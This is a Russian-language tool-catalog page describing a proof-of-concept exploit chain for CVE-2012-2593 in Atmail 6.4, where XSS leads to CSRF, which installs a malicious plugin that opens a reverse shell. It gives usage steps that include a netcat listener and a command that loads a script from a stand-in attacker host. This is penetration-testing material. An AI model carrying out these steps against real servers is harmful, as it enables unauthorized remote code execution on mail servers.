Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2012-2593 — Atmail XSS-CSRF-RCE Exploit Chain | Kitploit
Инструменты/GitHubGitHub/andrewtrube/cve-2012-2593
Фреймворки для эксплойтовГенерация полезной нагрузкиЭксплуатацияШелл-кодЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubandrewtrube/cve-2012-2593

CVE-2012-2593

Atmail XSS-CSRF-RCE Exploit Chain

Репозиторий
4 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Цепочка эксплойтов Atmail XSS-CSRF-RCE PoC

atmail-rce.py: Эксплуатирует CVE-2012-2593 в веб-интерфейсе Atmail.

atmail-csrf.js: JavaScript-файл, который использует CVE-2012-2593 для CSRF для установки вредоносного плагина, выполняющего обратную оболочку.

Plugin.php: Плагин Atmail, который устанавливается и вызывает обратную оболочку.

!!Используйте только против серверов, на которые у вас есть разрешение для тестирования

Краткое описание

Почтовый сервер Atmail версии 6.4 имеет уязвимость XSS как в заголовке письма Date, так и в теле письма (через инъекцию iFrame). Это используется для CSRF с помощью JavaScript XHR API для отправки запроса с cookie администратора на веб-панель администратора, устанавливая вредоносный плагин, который выполняет код для обратной оболочки.

Доказательство концепции

  1. Запустите слушатель netcat nc -lvp 4444
  2. Откройте Plugin.php и измените IP-адрес и порт на адрес вашего слушателя netcat
  3. Сожмите Plugin с помощью gzip и закодируйте в base64 gzip -c Plugin.php | base64 | tr -d [:space:]
  4. Скопируйте и вставьте вывод выше в переменную data в atmail-csrf.js
  5. Запустите скрипт atmail-rce.py python3 ./atmail-rce.py -u attacker@localhost -r admin@localhost -x http://attacker.com/malicious.js -t http://atmail.com/
  6. Дождитесь, пока администратор войдет в свою почту

Предостережения

  • Работает только если целью XSS является администратор Atmail
  • Работает только если цель вошла как в веб-интерфейс почты, так и в административный интерфейс сервера
  • Работает только если установка плагинов разрешена на сервере (включено по умолчанию)
Скачать инструмент